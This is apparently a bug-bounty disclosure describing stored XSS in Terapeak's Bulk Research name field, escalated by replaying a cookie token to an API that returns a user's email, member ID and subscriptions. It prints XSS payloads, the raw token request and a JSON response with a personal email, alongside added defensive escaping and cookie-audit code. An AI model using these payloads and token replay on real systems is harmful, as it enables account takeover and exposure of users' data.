Stored XSS to Full Information disclosure

Hello pals,

During research on terapeak.com I found that the Bulk Research name field is vulnerable to stored XSS.

Note: You need a Terapeak Professional subscription.

POC:

Step 1: Go to your account and click on Bulk Research.
Step 2: Type anything in the search box and click Search.
Step 3: Click the Save button.
Step 4: Enter your XSS payload as the Bulk Research name (in my case I used "><img src=x onerror=prompt(document.cookie)>) and click Save.
Step 5: The XSS prompt fires and shows the user's cookie and token.
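The root cause, shown as an added example that is not code from this post or from Terapeak: the saved name is assumed to be concatenated into an HTML attribute without escaping, so the payload above terminates the attribute and the tag; the hardened version entity-encodes it, and a small check flags any rendering that ends up with extra tags or inline event handlers (the template markup is an assumption).

```javascript
// Added example, not Terapeak's code: how an unescaped Bulk Research name
// becomes stored XSS, and how escaping fixes it. The template is assumed.

// The payload from the write-up: closes the value="..." attribute and the
// <input> tag, then injects an <img> whose onerror handler runs.
const PAYLOAD = '"><img src=x onerror=prompt(document.cookie)>';

// Vulnerable rendering (assumed): the saved name is concatenated into markup.
function renderNameUnsafe(name) {
  return '<input class="bulk-name" value="' + name + '">';
}

// Hardened rendering: HTML-significant characters become entities first, so
// the name can never terminate the attribute or start a new tag.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderNameSafe(name) {
  return '<input class="bulk-name" value="' + escapeHtml(name) + '">';
}

// Attribute names of a single tag, honouring quoted values so an escaped
// "onerror=" sitting inside a value is not mistaken for a real attribute.
function attributeNames(tag) {
  const body = tag.replace(/^<[a-zA-Z][\w-]*/, '').replace(/\/?>$/, '');
  const re = /\s+([^\s=\/>"']+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(body)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// True when the rendered markup carries anything beyond the template's one
// <input>: an extra tag, or an inline on* event handler attribute.
function hasInjectedMarkup(html) {
  const tags = html.match(/<[a-zA-Z][^>]*>/g) || [];
  if (tags.length !== 1) return true;
  return attributeNames(tags[0]).some((n) => n.startsWith('on'));
}

console.log('unsafe injected:', hasInjectedMarkup(renderNameUnsafe(PAYLOAD))); // true
console.log('safe injected:  ', hasInjectedMarkup(renderNameSafe(PAYLOAD)));   // false
```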

After digging further I found that with that token you can retrieve the full information of that user, such as:

email address, full name, member ID, subscription type, and other details.

The request to get user details:

GET /services/users/information?token=801037a4f46eda24abaeded7b6c4a2bca737cdbf73c33b982591e282d504f2b1 HTTP/1.1
Host: sell.terapeak.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Length: 0
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json
Date: Mon, 07 Nov 2016 21:49:21 GMT
P3P: CP="Thanks IE"
Vary: Accept-Encoding
Content-Length: 5763
Connection: Close

{"success":true,"parameters":{},"results":{"lastName":"src=x","country":null,"subscriptions":[{"memberId":1257777,"subscriptionId":2039604,"externalSubscriptionId":"10003451257777","terapeakPackage":{"packageId":345,"packageName":"Terapeak_Professional"},"suspended":false,"cancelPending":false,"startDate":1478521710000,"nextPaymentDate":1479241543000,"deadBeat":false,"expectedCurrency":1,"freeTrialLength":{"type":"interval","value":"0 years 0 mons 7 days 0 hours 0 mins 0.00 secs","years":0,"months":0,"days":7,"hours":0,"minutes":0,"seconds":0.0},"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"},{"memberId":1257777,"subscriptionId":2010523,"terapeakPackage":{"packageId":343,"packageName":"Terapeak_free_2014"},"suspended":false,"cancelPending":false,"startDate":1475504386000,"deadBeat":false,"expectedCurrency":1,"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"},{"memberId":1257777,"subscriptionId":2039610,"terapeakPackage":{"packageId":348,"packageName":"SEO_Professional"},"suspended":false,"cancelPending":false,"startDate":1478521996000,"nextPaymentDate":1479241977000,"deadBeat":false,"freeTrialLength":{"type":"interval","value":"0 years 0 mons 7 days 0 hours 0 mins 0.00 secs","years":0,"months":0,"days":7,"hours":0,"minutes":0,"seconds":0.0},"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"},{"memberId":1257777,"subscriptionId":2039653,"terapeakPackage":{"packageId":351,"packageName":"MySales_Pro_eBay"},"suspended":false,"cancelPending":false,"startDate":1478524074000,"nextPaymentDate":1479244062000,"deadBeat":false,"freeTrialLength":{"type":"interval","value":"0 years 0 mons 7 days 0 hours 0 mins 0.00 secs","years":0,"months":0,"days":7,"hours":0,"minutes":0,"seconds":0.0},"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"}],"address":null,"city":null,"postalCode":null,"owned_subscriptions":[{"memberId":1257777,"subscriptionId":2039604,"externalSubscriptionId":"10003451257777","terapeakPackage":{"packageId":345,"packageName":"Terapeak_Professional"},"suspended":false,"cancelPending":false,"startDate":1478521710000,"nextPaymentDate":1479241543000,"deadBeat":false,"expectedCurrency":1,"freeTrialLength":{"type":"interval","value":"0 years 0 mons 7 days 0 hours 0 mins 0.00 secs","years":0,"months":0,"days":7,"hours":0,"minutes":0,"seconds":0.0},"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"},{"memberId":1257777,"subscriptionId":2010523,"terapeakPackage":{"packageId":343,"packageName":"Terapeak_free_2014"},"suspended":false,"cancelPending":false,"startDate":1475504386000,"deadBeat":false,"expectedCurrency":1,"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"},{"memberId":1257777,"subscriptionId":2039610,"terapeakPackage":{"packageId":348,"packageName":"SEO_Professional"},"suspended":false,"cancelPending":false,"startDate":1478521996000,"nextPaymentDate":1479241977000,"deadBeat":false,"freeTrialLength":{"type":"interval","value":"0 years 0 mons 7 days 0 hours 0 mins 0.00 secs","years":0,"months":0,"days":7,"hours":0,"minutes":0,"seconds":0.0},"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"},{"memberId":1257777,"subscriptionId":2039653,"terapeakPackage":{"packageId":351,"packageName":"MySales_Pro_eBay"},"suspended":false,"cancelPending":false,"startDate":1478524074000,"nextPaymentDate":1479244062000,"deadBeat":false,"freeTrialLength":{"type":"interval","value":"0 years 0 mons 7 days 0 hours 0 mins 0.00 secs","years":0,"months":0,"days":7,"hours":0,"minutes":0,"seconds":0.0},"partnerId":1,"ownerMemberId":1257777,"accessLevel":"all"}],"firstName":"<svg/onload=prompt(1)>","phoneNumber":null,"province":null,"owned_suspended_expired_subscriptions":[],"permissions":{"bulkResearch":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"userManagement":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"subscriptions":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"productBooster":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"eBayCompetitorResearch":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"billings":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"automatedAlerts":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"EXPAND_SCORING_PARAMETERS":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"page_research_top_titles":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"OPTIMIZE_LISTING_SCORE":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"Listings":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"eBaySavedSearches":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"Home":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"productWorksheets":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"eBayTitleBuilder":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"Settings":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"amazonSavedSearches":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"LISTING_QUICK_SEARCH":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"alibaba":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"page_research_top_sellers":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"linkedChannels":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"amazonProductResearch":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"eBayHotResearch":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"productGallery":["PHOENIX_PROFESSIONAL","PHOENIX_FREE","PHOENIX_PERSONAL"],"marketAnalysis":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"eBayCategoryResearch":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"eBayProductResearch":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"sourceProducts":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"],"search_365_days":["PHOENIX_PROFESSIONAL","PHOENIX_PERSONAL"]},"allowOptOut":false,"email":"shubhamgupta109.1995@gmail.com","memberId":1257777}}
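Two defensive checks for the token half of this finding, as an added example that is not code from the post or from Terapeak: prompt(document.cookie) returned the token, so the cookie carrying it was readable by script (an inference from the write-up), and the user-information endpoint accepted it as a GET query parameter, where it lands in server and proxy logs. The cookie names and token values below are constructed placeholders; the write-up does not name the cookie.

```javascript
// Added example, not Terapeak's code. Audits Set-Cookie headers for cookies a
// stored XSS payload could read, and flags request targets that carry a token
// in the query string. Cookie names and values are constructed placeholders.

// Parse one Set-Cookie header value into its name and the flags that matter here.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [name] = parts[0].split('=');
  const flags = new Set(parts.slice(1).map((p) => p.split('=')[0].toLowerCase()));
  return { name, httpOnly: flags.has('httponly'), secure: flags.has('secure') };
}

// Names of cookies that document.cookie would expose to injected script,
// i.e. every cookie set without the HttpOnly attribute.
function scriptReadableCookies(headers) {
  return headers.map(parseSetCookie).filter((c) => !c.httpOnly).map((c) => c.name);
}

// A bearer token in the query string is written to access logs and leaks in
// Referer headers; flag any request target that carries one. Node's URL class
// is used; the base origin only makes relative targets parseable.
function tokenInQuery(requestTarget) {
  const url = new URL(requestTarget, 'https://sell.terapeak.com');
  return url.searchParams.has('token');
}

// Constructed sample headers: the first is readable by script, the second is not.
const SAMPLE_HEADERS = [
  'tp_token=PLACEHOLDER_TOKEN; Path=/; Secure',
  'session=PLACEHOLDER_SESSION; Path=/; Secure; HttpOnly; SameSite=Lax',
];

console.log('script-readable cookies:', scriptReadableCookies(SAMPLE_HEADERS)); // [ 'tp_token' ]
console.log('token in query:', tokenInQuery('/services/users/information?token=PLACEHOLDER')); // true
```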

Thank you!!

shubhamgupta
